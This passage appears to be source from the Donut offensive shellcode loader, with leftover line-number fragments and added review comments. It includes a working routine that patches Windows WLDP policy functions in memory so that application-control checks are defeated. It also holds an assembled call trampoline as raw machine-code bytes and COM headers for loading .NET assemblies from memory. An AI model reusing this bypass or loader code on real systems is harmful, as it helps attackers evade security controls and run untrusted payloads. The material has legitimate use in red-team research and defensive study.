    cs = inst->api.GetProcAddress(wldp, inst->wldpQuery);
    if(cs == NULL) return FALSE;
    
    // calculate length of stub (assumes the marker follows the stub in memory)
    len = (ULONG_PTR)WldpQueryDynamicCodeTrustStubEnd -
          (ULONG_PTR)WldpQueryDynamicCodeTrustStub;

    DPRINT("Length of WldpQueryDynamicCodeTrustStub is %" PRIi32 " bytes.", len);

    // check for negative length. this would only happen when
    // compiler decides to re-order functions.
    if((int)len < 0) return FALSE;
    
    // make the memory writeable. return FALSE on error
    if(!inst->api.VirtualProtect(
      cs, len, PAGE_EXECUTE_READWRITE, &op)) return FALSE;
      
    // copy the stub's machine code over the export's entry
    Memcpy(cs, ADR(PCHAR, WldpQueryDynamicCodeTrustStub), len);
    // set back to original protection (result not checked)
    inst->api.VirtualProtect(cs, len, op, &t);
    
    // resolve address of WldpIsClassInApprovedList
    // if not found, return FALSE because it should exist
    cs = inst->api.GetProcAddress(wldp, inst->wldpIsApproved);
    if(cs == NULL) return FALSE;
    
    // calculate length of stub (same adjacency assumption as above)
    len = (ULONG_PTR)WldpIsClassInApprovedListStubEnd -
          (ULONG_PTR)WldpIsClassInApprovedListStub;

    DPRINT("Length of WldpIsClassInApprovedListStub is %" PRIi32 " bytes.", len);

    // check for negative length. this would only happen when
    // compiler decides to re-order functions.
    if((int)len < 0) return FALSE;
    
    // make the memory writeable. return FALSE on error
    if(!inst->api.VirtualProtect(
      cs, len, PAGE_EXECUTE_READWRITE, &op)) return FALSE;
      
    // copy the stub's machine code over the export's entry
    Memcpy(cs, ADR(PCHAR, WldpIsClassInApprovedListStub), len);
    // set back to original protection (result not checked)
    inst->api.VirtualProtect(cs, len, op, &t);
    
    return TRUE;
}
365 | #elif defined(BYPASS_WLDP_B) | |
366 | // This is where you may define your own WLDP bypass. | |
367 | // To rebuild with your bypass, modify the makefile to add an option to build with BYPASS_WLDP_B defined. | |
368 | ||
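// Variant B: template slot for a user-supplied WLDP bypass (build with
// BYPASS_WLDP_B defined). Nothing is implemented here, so the function
// fails closed: FALSE tells the caller that no bypass took place.
//
// Fix: the previous body was empty, which falls off the end of a BOOL
// function — undefined behaviour that left the caller reading whatever
// happened to be in the return register.
//
// inst: the loader instance (unused until a bypass is written here).
// Returns FALSE always.
BOOL DisableWLDP(PDONUT_INSTANCE inst) {
    (void)inst;
    return FALSE;
}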
372 | #endif |
0 | ; | |
1 | ; Copyright © 2019 TheWover, Odzhan. All Rights Reserved. | |
2 | ; | |
3 | ; Redistribution and use in source and binary forms, with or without | |
4 | ; modification, are permitted provided that the following conditions are | |
5 | ; met: | |
6 | ; | |
7 | ; 1. Redistributions of source code must retain the above copyright | |
8 | ; notice, this list of conditions and the following disclaimer. | |
9 | ; | |
10 | ; 2. Redistributions in binary form must reproduce the above copyright | |
11 | ; notice, this list of conditions and the following disclaimer in the | |
12 | ; documentation and/or other materials provided with the distribution. | |
13 | ; | |
14 | ; 3. The name of the author may not be used to endorse or promote products | |
15 | ; derived from this software without specific prior written permission. | |
16 | ; | |
17 | ; THIS SOFTWARE IS PROVIDED BY AUTHORS "AS IS" AND ANY EXPRESS OR | |
18 | ; IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED | |
19 | ; WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
20 | ; DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, | |
21 | ; INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES | |
22 | ; (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
23 | ; SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) | |
24 | ; HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, | |
25 | ; STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN | |
26 | ; ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE | |
27 | ; POSSIBILITY OF SUCH DAMAGE. | |
28 | ; | |
29 | ; | |
; void call_api(FARPROC api, int param_cnt, WCHAR param[]);
;
; Trampoline that invokes a DLL export with up to DONUT_MAX_PARAM pointer
; arguments. `param` is an array of DONUT_MAX_PARAM fixed-size
; WCHAR[DONUT_MAX_NAME] slots (stride DONUT_MAX_NAME * 2 bytes); the address
; of each slot is what gets passed to the export. The same bytes run as x86
; and x64 code: the prologue detects the mode and jumps to the matching path.
; The assembled output appears to be what call_api_bin.h carries, so that
; header must be regenerated whenever this file changes.

%define DONUT_MAX_PARAM 8
%define DONUT_MAX_NAME 256

; Win64 home ("shadow") space: 32 bytes a callee may use to spill rcx/rdx/r8/r9.
struc HOME_SPACE
    ._rcx resq 1
    ._rdx resq 1
    ._r8  resq 1
    ._r9  resq 1
endstruc

; Stack frame for the x64 path. Under the Win64 convention the 5th..8th
; arguments sit directly above the 32-byte home space, i.e. at rsp+0x20..0x38
; at the moment of the call.
struc _ds
    ; NOTE(review): `resq` reserves quadwords, not bytes, so this field is
    ; HOME_SPACE_size (32) * 8 = 256 bytes. arg4..arg7 therefore land at
    ; rsp+0x100..0x118 (the 0x100 displacement is visible in call_api_bin.h),
    ; not at rsp+0x20 where a callee looks for its 5th argument. Exports that
    ; take more than four parameters would read garbage for the rest.
    ; `resb HOME_SPACE_size` (or `resq 4`) is presumably what was intended;
    ; verify before changing and regenerate call_api_bin.h afterwards.
    .hs: resq HOME_SPACE_size

    .arg4 resq 1
    .arg5 resq 1
    .arg6 resq 1
    .arg7 resq 1

    ; save area for the callee-saved registers clobbered below
    ._rdi resq 1
    ._rsi resq 1
    ._rbp resq 1
    ._rbx resq 1
    ._rsp resq 1   ; reserved but never written or read
endstruc

%ifndef BIN
    global call_api
    global _call_api
%endif

call_api:
_call_api:
    bits 32

    ; int3

    ; Mode probe. In 32-bit mode `dec eax` turns 0 into 0xFFFFFFFF and sets SF,
    ; so `jns` falls through to the x86 path. In 64-bit mode the same byte
    ; (0x48) decodes as a REX prefix on the `jns`, SF is still clear from the
    ; xor, and the jump to L2 is taken.
    xor eax, eax ;
    dec eax ;
    jns L2 ; if SF=0, goto x64

    ; ---- x86 path: arguments on the stack ----
    mov eax, [esp+ 4] ; eax = api address
    mov ecx, [esp+ 8] ; ecx = param_cnt
    mov edx, [esp+12] ; edx = &param[0]
L1:
    ; NOTE(review): slots are pushed in ascending index order, so after the
    ; loop &param[param_cnt-1] is on top and becomes the callee's FIRST
    ; argument (stack arguments are normally pushed last-to-first). Either
    ; the callee expects that order or the caller stores the slots reversed —
    ; verify against the generator. Also assumes param_cnt >= 1: with 0 the
    ; `sub` wraps to 0xFFFFFFFF and the loop pushes until the stack is gone.
    push edx ; push &param[i]
    add edx, DONUT_MAX_NAME * 2 ; advance to next WCHAR[DONUT_MAX_NAME] slot
    sub ecx, 1 ; subtract one from param_cnt
    jnz L1
    ; Nothing is popped after the call, so this relies on a callee-cleans-up
    ; convention (stdcall/WINAPI). A cdecl export would leave the pushed
    ; pointers on the stack and the `ret` below would pop one of them as the
    ; return address.
    call eax ; call api
    ret

L2:
    bits 64

    ; Allocate the frame, sized so rsp is 16-byte aligned at the call
    ; (rsp is 8 mod 16 on entry because of the pushed return address).
    sub rsp, ((_ds_size & -16) + 16) - 8

    mov [rsp+_ds._rbp], rbp ; preserve callee-saved registers
    mov [rsp+_ds._rbx], rbx
    mov [rsp+_ds._rdi], rdi
    mov [rsp+_ds._rsi], rsi

    mov rsi, rsp ; rsi = rsp after allocation (restored after the call)
    mov rdi, rcx ; rdi = api to call
    mov eax, DONUT_MAX_NAME * 2 ; rax = byte stride between slots

    ; param_cnt (rdx) is never consulted on this path: all eight slot
    ; addresses are always materialised, four in registers and four on the
    ; stack (rdx is overwritten below before it is read).
    mov rcx, r8 ; rcx = &param[0]
    lea rdx, [rcx+rax] ; rdx = &param[1]
    lea r8, [rdx+rax] ; r8 = &param[2]
    lea r9, [r8+rax] ; r9 = &param[3]

    lea rbx, [r9+rax]
    mov [rsp+_ds.arg4], rbx ; &param[4] (see the NOTE on _ds: offset is 0x100, not 0x20)
    add rbx, rax
    mov [rsp+_ds.arg5], rbx ; &param[5]
    add rbx, rax
    mov [rsp+_ds.arg6], rbx ; &param[6]
    add rbx, rax
    mov [rsp+_ds.arg7], rbx ; &param[7]
    call rdi

    mov rsp, rsi ; restore rsp after allocation
    mov rsi, [rsp+_ds._rsi]
    mov rdi, [rsp+_ds._rdi]
    mov rbx, [rsp+_ds._rbx]
    mov rbp, [rsp+_ds._rbp]

    add rsp, ((_ds_size & -16) + 16) - 8
    ret
120 | ⏎ |
0 | ||
// Assembled bytes of call_api.asm, packed as little-endian dwords (187 code
// bytes, zero-padded to 47 dwords). This is generated output: regenerate it
// from the assembler source instead of editing values here, and keep the two
// in sync — the x64 frame layout in particular is baked into these bytes
// (e.g. the `sub rsp, 0x148` in [8..9] and the 0x100 displacement used to
// store the 5th argument, visible in [26]). The shape "array declaration
// followed by element assignments" is only valid inside a function body, so
// this header is presumably #included from one — verify.
//
// [0] starts with 31 C0 48 79 1B: the x86/x64 mode probe from call_api.asm.
unsigned int CALL_API_BIN[47];

CALL_API_BIN[0] = 0x7948C031;
CALL_API_BIN[1] = 0x24448B1B;
CALL_API_BIN[2] = 0x244C8B04;
CALL_API_BIN[3] = 0x24548B08;
CALL_API_BIN[4] = 0xC281520C;
CALL_API_BIN[5] = 0x00000200;
CALL_API_BIN[6] = 0x7501E983;
CALL_API_BIN[7] = 0xC3D0FFF4;
CALL_API_BIN[8] = 0x48EC8148;
CALL_API_BIN[9] = 0x48000001;
CALL_API_BIN[10] = 0x3024AC89;
CALL_API_BIN[11] = 0x48000001;
CALL_API_BIN[12] = 0x38249C89;
CALL_API_BIN[13] = 0x48000001;
CALL_API_BIN[14] = 0x2024BC89;
CALL_API_BIN[15] = 0x48000001;
CALL_API_BIN[16] = 0x2824B489;
CALL_API_BIN[17] = 0x48000001;
CALL_API_BIN[18] = 0x8948E689;
CALL_API_BIN[19] = 0x0200B8CF;
CALL_API_BIN[20] = 0x894C0000;
CALL_API_BIN[21] = 0x148D48C1;
CALL_API_BIN[22] = 0x048D4C01;
CALL_API_BIN[23] = 0x0C8D4D02;
CALL_API_BIN[24] = 0x1C8D4900;
CALL_API_BIN[25] = 0x9C894801;
CALL_API_BIN[26] = 0x00010024;
CALL_API_BIN[27] = 0xC3014800;
CALL_API_BIN[28] = 0x249C8948;
CALL_API_BIN[29] = 0x00000108;
CALL_API_BIN[30] = 0x48C30148;
CALL_API_BIN[31] = 0x10249C89;
CALL_API_BIN[32] = 0x48000001;
CALL_API_BIN[33] = 0x8948C301;
CALL_API_BIN[34] = 0x0118249C;
CALL_API_BIN[35] = 0xD7FF0000;
CALL_API_BIN[36] = 0x48F48948;
CALL_API_BIN[37] = 0x2824B48B;
CALL_API_BIN[38] = 0x48000001;
CALL_API_BIN[39] = 0x2024BC8B;
CALL_API_BIN[40] = 0x48000001;
CALL_API_BIN[41] = 0x38249C8B;
CALL_API_BIN[42] = 0x48000001;
CALL_API_BIN[43] = 0x3024AC8B;
CALL_API_BIN[44] = 0x48000001;
CALL_API_BIN[45] = 0x0148C481;
CALL_API_BIN[46] = 0x00C30000;
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2019, TheWover, Odzhan. All rights reserved. | |
4 | ||
5 | Redistribution and use in source and binary forms, with or without | |
6 | modification, are permitted provided that the following conditions are met: | |
7 | ||
8 | * Redistributions of source code must retain the above copyright notice, this | |
9 | list of conditions and the following disclaimer. | |
10 | ||
11 | * Redistributions in binary form must reproduce the above copyright notice, | |
12 | this list of conditions and the following disclaimer in the documentation | |
13 | and/or other materials provided with the distribution. | |
14 | ||
15 | * Neither the name of the copyright holder nor the names of its | |
16 | contributors may be used to endorse or promote products derived from | |
17 | this software without specific prior written permission. | |
18 | ||
19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
20 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
21 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
22 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
23 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
24 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
25 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
26 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
27 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
29 | */ | |
30 | ||
31 | #include <inttypes.h> | |
32 | #include <stddef.h> | |
33 | ||
34 | // functions to replace intrinsic C library functions | |
35 | ||
// Byte-fill replacement for memset: stores the low byte of `value` into each
// of the `num` bytes starting at `ptr` and returns `ptr`. A zero `num` is a
// no-op.
//
// Kept out of the C library on purpose (presumably because the loader is
// linked without a CRT). MSVC recognises the plain byte loop and rewrites it
// back into a memset call, which is why that path uses the rep-stosb
// intrinsic instead of C.
void *Memset (void *ptr, int value, size_t num) {

#ifdef _MSC_VER
    __stosb(ptr, value, num);
#else
    unsigned char *cursor = (unsigned char*)ptr;
    unsigned char *end    = cursor + num;

    for (; cursor != end; cursor++) {
        *cursor = (unsigned char)value;
    }
#endif
    return ptr;
}
52 | ||
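// Forward byte copy replacement for memcpy: copies `num` bytes from `source`
// to `destination` and returns `destination`. The regions must not overlap
// (memcpy's contract — this is not memmove). A zero `num` is a no-op.
//
// Fix: the source cursor is now `const unsigned char *`, so the cast no
// longer discards the const qualifier of `source` (the function never
// writes through it). Behaviour is otherwise unchanged.
void *Memcpy (void *destination, const void *source, size_t num) {
    unsigned char       *out = (unsigned char*)destination;
    const unsigned char *in  = (const unsigned char*)source;

    while(num--) {
        *out++ = *in++;
    }
    return destination;
}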
63 | ||
// Replacement for memcmp: compares `num` bytes as unsigned chars and returns
// 0 when they are all equal, otherwise -1 or 1 according to the first
// differing byte (unlike memcmp, only these three values are ever returned).
// A zero `num` compares equal.
int Memcmp(const void *ptr1, const void *ptr2, size_t num) {
    const unsigned char *a = (const unsigned char*)ptr1;
    const unsigned char *b = (const unsigned char*)ptr2;
    size_t i;

    for (i = 0; i < num; i++) {
        if (a[i] == b[i]) continue;
        return (a[i] < b[i]) ? -1 : 1;
    }
    return 0;
}
73 | } |
0 | /** | |
1 | BSD 3-Clause License | |
2 | ||
3 | Copyright (c) 2019, TheWover, Odzhan. All rights reserved. | |
4 | ||
5 | Redistribution and use in source and binary forms, with or without | |
6 | modification, are permitted provided that the following conditions are met: | |
7 | ||
8 | * Redistributions of source code must retain the above copyright notice, this | |
9 | list of conditions and the following disclaimer. | |
10 | ||
11 | * Redistributions in binary form must reproduce the above copyright notice, | |
12 | this list of conditions and the following disclaimer in the documentation | |
13 | and/or other materials provided with the distribution. | |
14 | ||
15 | * Neither the name of the copyright holder nor the names of its | |
16 | contributors may be used to endorse or promote products derived from | |
17 | this software without specific prior written permission. | |
18 | ||
19 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" | |
20 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE | |
21 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE | |
22 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE | |
23 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL | |
24 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR | |
25 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER | |
26 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, | |
27 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE | |
28 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. | |
29 | */ | |
30 | ||
31 | #ifndef CLR_H | |
32 | #define CLR_H | |
33 | ||
34 | typedef struct _ICLRMetaHost ICLRMetaHost; | |
35 | typedef struct _ICLRRuntimeInfo ICLRRuntimeInfo; | |
36 | typedef struct _ICorRuntimeHost ICorRuntimeHost; | |
37 | typedef struct _ICorConfiguration ICorConfiguration; | |
38 | typedef struct _IGCThreadControl IGCThreadControl; | |
39 | typedef struct _IGCHostControl IGCHostControl; | |
40 | typedef struct _IDebuggerThreadControl IDebuggerThreadControl; | |
41 | typedef struct _AppDomain IAppDomain; | |
42 | typedef struct _Assembly IAssembly; | |
43 | typedef struct _Type IType; | |
44 | typedef struct _Binder IBinder; | |
45 | typedef struct _MethodInfo IMethodInfo; | |
46 | ||
47 | typedef void *HDOMAINENUM; | |
48 | ||
49 | typedef HRESULT ( __stdcall *CLRCreateInstanceFnPtr )( | |
50 | REFCLSID clsid, | |
51 | REFIID riid, | |
52 | LPVOID *ppInterface); | |
53 | ||
54 | typedef HRESULT ( __stdcall *CreateInterfaceFnPtr )( | |
55 | REFCLSID clsid, | |
56 | REFIID riid, | |
57 | LPVOID *ppInterface); | |
58 | ||
59 | ||
60 | typedef HRESULT ( __stdcall *CallbackThreadSetFnPtr )( void); | |
61 | ||
62 | typedef HRESULT ( __stdcall *CallbackThreadUnsetFnPtr )( void); | |
63 | ||
64 | typedef void ( __stdcall *RuntimeLoadedCallbackFnPtr )( | |
65 | ICLRRuntimeInfo *pRuntimeInfo, | |
66 | CallbackThreadSetFnPtr pfnCallbackThreadSet, | |
67 | CallbackThreadUnsetFnPtr pfnCallbackThreadUnset); | |
68 | ||
69 | #undef DUMMY_METHOD | |
70 | #define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IBinder *This) | |
71 | ||
// Vtable for the .NET _Binder interface, reached through IBinder::lpVtbl.
// Only the IUnknown triple (QueryInterface/AddRef/Release) is given a real
// prototype; every other slot is a DUMMY_METHOD placeholder whose only job
// is to hold its position. Slot order and count are load-bearing: inserting,
// removing or reordering an entry silently redirects indirect calls made
// through this table to the wrong method. Unlike the other vtables in this
// header, this one is not bracketed by BEGIN_INTERFACE/END_INTERFACE.
typedef struct _BinderVtbl {
    HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
        IBinder * This,
        /* [in] */ REFIID riid,
        /* [iid_is][out] */ void **ppvObject);

    ULONG ( STDMETHODCALLTYPE *AddRef )(
        IBinder * This);

    ULONG ( STDMETHODCALLTYPE *Release )(
        IBinder * This);

    DUMMY_METHOD(GetTypeInfoCount);
    DUMMY_METHOD(GetTypeInfo);
    DUMMY_METHOD(GetIDsOfNames);
    DUMMY_METHOD(Invoke);
    DUMMY_METHOD(ToString);
    DUMMY_METHOD(Equals);
    DUMMY_METHOD(GetHashCode);
    DUMMY_METHOD(GetType);
    DUMMY_METHOD(BindToMethod);
    DUMMY_METHOD(BindToField);
    DUMMY_METHOD(SelectMethod);
    DUMMY_METHOD(SelectProperty);
    DUMMY_METHOD(ChangeType);
    DUMMY_METHOD(ReorderArgumentArray);
} BinderVtbl;
99 | ||
// COM object layout: the object is a single pointer to its vtable, so a
// method is invoked as obj->lpVtbl->Method(obj, ...).
typedef struct _Binder {
    BinderVtbl *lpVtbl;
} Binder;
103 | ||
104 | #undef DUMMY_METHOD | |
105 | #define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IAppDomain *This) | |
106 | ||
// Vtable for the .NET _AppDomain interface, reached through IAppDomain::lpVtbl.
// Besides the IUnknown triple, only Load_3 (load an assembly from a raw byte
// SAFEARRAY) is typed; all other slots are DUMMY_METHOD placeholders that
// exist solely to keep Load_3 at its correct offset. Slot order and count are
// load-bearing — do not reorder, insert or drop entries.
typedef struct _AppDomainVtbl {
    BEGIN_INTERFACE

    HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
        IAppDomain * This,
        /* [in] */ REFIID riid,
        /* [iid_is][out] */ void **ppvObject);

    ULONG ( STDMETHODCALLTYPE *AddRef )(
        IAppDomain * This);

    ULONG ( STDMETHODCALLTYPE *Release )(
        IAppDomain * This);

    DUMMY_METHOD(GetTypeInfoCount);
    DUMMY_METHOD(GetTypeInfo);
    DUMMY_METHOD(GetIDsOfNames);
    DUMMY_METHOD(Invoke);

    DUMMY_METHOD(ToString);
    DUMMY_METHOD(Equals);
    DUMMY_METHOD(GetHashCode);
    DUMMY_METHOD(GetType);
    DUMMY_METHOD(InitializeLifetimeService);
    DUMMY_METHOD(GetLifetimeService);
    DUMMY_METHOD(Evidence);
    DUMMY_METHOD(add_DomainUnload);
    DUMMY_METHOD(remove_DomainUnload);
    DUMMY_METHOD(add_AssemblyLoad);
    DUMMY_METHOD(remove_AssemblyLoad);
    DUMMY_METHOD(add_ProcessExit);
    DUMMY_METHOD(remove_ProcessExit);
    DUMMY_METHOD(add_TypeResolve);
    DUMMY_METHOD(remove_TypeResolve);
    DUMMY_METHOD(add_ResourceResolve);
    DUMMY_METHOD(remove_ResourceResolve);
    DUMMY_METHOD(add_AssemblyResolve);
    DUMMY_METHOD(remove_AssemblyResolve);
    DUMMY_METHOD(add_UnhandledException);
    DUMMY_METHOD(remove_UnhandledException);
    DUMMY_METHOD(DefineDynamicAssembly);
    DUMMY_METHOD(DefineDynamicAssembly_2);
    DUMMY_METHOD(DefineDynamicAssembly_3);
    DUMMY_METHOD(DefineDynamicAssembly_4);
    DUMMY_METHOD(DefineDynamicAssembly_5);
    DUMMY_METHOD(DefineDynamicAssembly_6);
    DUMMY_METHOD(DefineDynamicAssembly_7);
    DUMMY_METHOD(DefineDynamicAssembly_8);
    DUMMY_METHOD(DefineDynamicAssembly_9);
    DUMMY_METHOD(CreateInstance);
    DUMMY_METHOD(CreateInstanceFrom);
    DUMMY_METHOD(CreateInstance_2);
    DUMMY_METHOD(CreateInstanceFrom_2);
    DUMMY_METHOD(CreateInstance_3);
    DUMMY_METHOD(CreateInstanceFrom_3);
    DUMMY_METHOD(Load);
    DUMMY_METHOD(Load_2);

    // Load(byte[]) overload: rawAssembly is a SAFEARRAY of bytes holding the
    // assembly image; *pRetVal receives the loaded _Assembly on success.
    HRESULT (STDMETHODCALLTYPE *Load_3)(
        IAppDomain *This,
        SAFEARRAY *rawAssembly,
        IAssembly **pRetVal);

    DUMMY_METHOD(Load_4);
    DUMMY_METHOD(Load_5);
    DUMMY_METHOD(Load_6);
    DUMMY_METHOD(Load_7);
    DUMMY_METHOD(ExecuteAssembly);
    DUMMY_METHOD(ExecuteAssembly_2);
    DUMMY_METHOD(ExecuteAssembly_3);
    DUMMY_METHOD(FriendlyName);
    DUMMY_METHOD(BaseDirectory);
    DUMMY_METHOD(RelativeSearchPath);
    DUMMY_METHOD(ShadowCopyFiles);
    DUMMY_METHOD(GetAssemblies);
    DUMMY_METHOD(AppendPrivatePath);
    DUMMY_METHOD(ClearPrivatePath);
    DUMMY_METHOD(SetShadowCopyPath);
    DUMMY_METHOD(ClearShadowCopyPath);
    DUMMY_METHOD(SetCachePath);
    DUMMY_METHOD(SetData);
    DUMMY_METHOD(GetData);
    DUMMY_METHOD(SetAppDomainPolicy);
    DUMMY_METHOD(SetThreadPrincipal);
    DUMMY_METHOD(SetPrincipalPolicy);
    DUMMY_METHOD(DoCallBack);
    DUMMY_METHOD(DynamicDirectory);

    END_INTERFACE
} AppDomainVtbl;
197 | ||
// COM object layout: a single pointer to the vtable above.
typedef struct _AppDomain {
    AppDomainVtbl *lpVtbl;
} AppDomain;
201 | ||
202 | #undef DUMMY_METHOD | |
203 | #define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IAssembly *This) | |
204 | ||
// Vtable for the .NET _Assembly interface, reached through IAssembly::lpVtbl.
// Typed slots: the IUnknown triple, EntryPoint (the assembly's entry-point
// _MethodInfo) and GetType_2 (look up a _Type by name). Everything else is a
// DUMMY_METHOD placeholder kept only for its offset. Slot order and count are
// load-bearing — do not reorder, insert or drop entries.
typedef struct _AssemblyVtbl {
    BEGIN_INTERFACE

    HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
        IAssembly * This,
        REFIID riid,
        void **ppvObject);

    ULONG ( STDMETHODCALLTYPE *AddRef )(
        IAssembly * This);

    ULONG ( STDMETHODCALLTYPE *Release )(
        IAssembly * This);

    DUMMY_METHOD(GetTypeInfoCount);
    DUMMY_METHOD(GetTypeInfo);
    DUMMY_METHOD(GetIDsOfNames);

    DUMMY_METHOD(Invoke);
    DUMMY_METHOD(ToString);
    DUMMY_METHOD(Equals);
    DUMMY_METHOD(GetHashCode);
    DUMMY_METHOD(GetType);
    DUMMY_METHOD(CodeBase);
    DUMMY_METHOD(EscapedCodeBase);
    DUMMY_METHOD(GetName);
    DUMMY_METHOD(GetName_2);
    DUMMY_METHOD(FullName);

    // *pRetVal receives the assembly's entry-point method (if any).
    HRESULT (STDMETHODCALLTYPE *EntryPoint)(
        IAssembly *This,
        IMethodInfo **pRetVal);

    // Resolve a type by its (BSTR) name; *pRetVal receives the _Type.
    HRESULT (STDMETHODCALLTYPE *GetType_2)(
        IAssembly *This,
        BSTR name,
        IType **pRetVal);

    DUMMY_METHOD(GetType_3);
    DUMMY_METHOD(GetExportedTypes);
    DUMMY_METHOD(GetTypes);
    DUMMY_METHOD(GetManifestResourceStream);
    DUMMY_METHOD(GetManifestResourceStream_2);
    DUMMY_METHOD(GetFile);
    DUMMY_METHOD(GetFiles);
    DUMMY_METHOD(GetFiles_2);
    DUMMY_METHOD(GetManifestResourceNames);
    DUMMY_METHOD(GetManifestResourceInfo);
    DUMMY_METHOD(Location);
    DUMMY_METHOD(Evidence);
    DUMMY_METHOD(GetCustomAttributes);
    DUMMY_METHOD(GetCustomAttributes_2);
    DUMMY_METHOD(IsDefined);
    DUMMY_METHOD(GetObjectData);
    DUMMY_METHOD(add_ModuleResolve);
    DUMMY_METHOD(remove_ModuleResolve);
    DUMMY_METHOD(GetType_4);
    DUMMY_METHOD(GetSatelliteAssembly);
    DUMMY_METHOD(GetSatelliteAssembly_2);
    DUMMY_METHOD(LoadModule);
    DUMMY_METHOD(LoadModule_2);
    DUMMY_METHOD(CreateInstance);
    DUMMY_METHOD(CreateInstance_2);
    DUMMY_METHOD(CreateInstance_3);
    DUMMY_METHOD(GetLoadedModules);
    DUMMY_METHOD(GetLoadedModules_2);
    DUMMY_METHOD(GetModules);
    DUMMY_METHOD(GetModules_2);
    DUMMY_METHOD(GetModule);
    DUMMY_METHOD(GetReferencedAssemblies);
    DUMMY_METHOD(GlobalAssemblyCache);

    END_INTERFACE
} AssemblyVtbl;
279 | ||
// Native mirror of System.Reflection.BindingFlags. The numeric values must
// match the managed enumeration exactly because they are passed by value to
// _Type::InvokeMember_3 and interpreted by the runtime; this is a bit mask,
// so members are meant to be OR-ed together.
typedef enum _BindingFlags {
    BindingFlags_Default = 0,
    BindingFlags_IgnoreCase = 1,
    BindingFlags_DeclaredOnly = 2,
    BindingFlags_Instance = 4,
    BindingFlags_Static = 8,
    BindingFlags_Public = 16,
    BindingFlags_NonPublic = 32,
    BindingFlags_FlattenHierarchy = 64,
    BindingFlags_InvokeMethod = 256,
    BindingFlags_CreateInstance = 512,
    BindingFlags_GetField = 1024,
    BindingFlags_SetField = 2048,
    BindingFlags_GetProperty = 4096,
    BindingFlags_SetProperty = 8192,
    BindingFlags_PutDispProperty = 16384,
    BindingFlags_PutRefDispProperty = 32768,
    BindingFlags_ExactBinding = 65536,
    BindingFlags_SuppressChangeType = 131072,
    BindingFlags_OptionalParamBinding = 262144,
    BindingFlags_IgnoreReturn = 16777216
} BindingFlags;
302 | ||
// COM object layout: a single pointer to AssemblyVtbl.
typedef struct _Assembly {
    AssemblyVtbl *lpVtbl;
} Assembly;
306 | ||
307 | #undef DUMMY_METHOD | |
308 | #define DUMMY_METHOD(x) HRESULT ( STDMETHODCALLTYPE *dummy_##x )(IType *This) | |
309 | ||
// Vtable for the .NET _Type interface, reached through IType::lpVtbl.
// Besides the IUnknown triple, only InvokeMember_3 is typed; all other slots
// are DUMMY_METHOD placeholders that exist to keep InvokeMember_3 at its
// correct offset. Slot order and count are load-bearing — do not reorder,
// insert or drop entries.
typedef struct _TypeVtbl {
    BEGIN_INTERFACE

    HRESULT ( STDMETHODCALLTYPE *QueryInterface )(
        IType * This,
        REFIID riid,
        void **ppvObject);

    ULONG ( STDMETHODCALLTYPE *AddRef )(
        IType * This);

    ULONG ( STDMETHODCALLTYPE *Release )(
        IType * This);

    DUMMY_METHOD(GetTypeInfoCount);
    DUMMY_METHOD(GetTypeInfo);
    DUMMY_METHOD(GetIDsOfNames);
    DUMMY_METHOD(Invoke);

    DUMMY_METHOD(ToString);
    DUMMY_METHOD(Equals);
    DUMMY_METHOD(GetHashCode);
    DUMMY_METHOD(GetType);
    DUMMY_METHOD(MemberType);
    DUMMY_METHOD(name);
    DUMMY_METHOD(DeclaringType);
